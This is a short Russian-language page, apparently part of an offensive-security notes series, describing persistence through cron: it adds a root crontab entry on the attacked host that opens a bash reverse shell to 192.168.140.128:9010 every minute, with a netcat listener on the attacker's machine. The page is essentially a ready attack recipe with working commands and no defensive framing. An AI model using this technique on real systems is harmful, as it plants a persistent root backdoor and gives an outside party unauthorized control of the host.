04 - Cron Jobs

Суть та же что и bashrc, только нам не нужно ждать пока кто то залогинится, мы сами выставляем расписание для запуска reverse shell. Например заставить атакуемый хост отдавать нам шелл каждую минуту.

// Правим crontab на атакуемом хосте (расписание + шелл)
nano /etc/crontab
* * * * * root /bin/bash -i ">& /dev/tcp/192.168.140.128/9010 0>&1"

// На хосте атакующего все так же запускаем netcat
nc -lvp 9010

Через минуту шелл получен

Previous03 - bashrc Next05 - Systemd

Last updated 9 months ago